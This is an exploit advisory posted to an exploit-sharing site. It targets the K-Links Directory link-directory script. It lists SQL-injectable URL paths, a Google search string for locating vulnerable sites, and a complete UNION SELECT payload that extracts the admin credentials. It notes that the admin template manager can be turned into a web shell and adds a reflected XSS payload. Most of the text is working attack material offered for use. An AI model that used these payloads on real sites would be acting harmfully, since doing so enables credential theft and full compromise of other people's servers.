Lucene search

K
zdtCorwin1337DAY-ID-3499
HistoryAug 02, 2008 - 12:00 a.m.

K-Links Directory (SQL/XSS) Multiple Remote Vulnerabilities

2008-08-0200:00:00
Corwin
0day.today
15

Exploit for unknown platform in category web applications

===========================================================
K-Links Directory (SQL/XSS) Multiple Remote Vulnerabilities
===========================================================


================================================================================
|| K-Links Directory SQL-INJECTION, XSS                          
================================================================================

Application: K-Links Directory
--------

Version: Platinum (All)
--------

About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.
------

Googledork: Powered By K-Links Directory
-----------

Demo: http://klinksdemo.com
-----

[ SQL-INJECTION ]

http://host/report/-1[SQL]
http://host/visit.php?id=-1[SQL]
http://host/addreview/-1[SQL]
http://host/refer/-1[SQL]

===>>> Exploit:

http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/*


/* Admin Login -  http://host/admin 

Manage Templates => web-shell */


[ PASSIVE XSS  :)  ]

http://host/index.php?req=login&redirect=&login_message=<script>alert()</script>


Author: Corwin
-------       


#  0day.today [2018-01-10]  #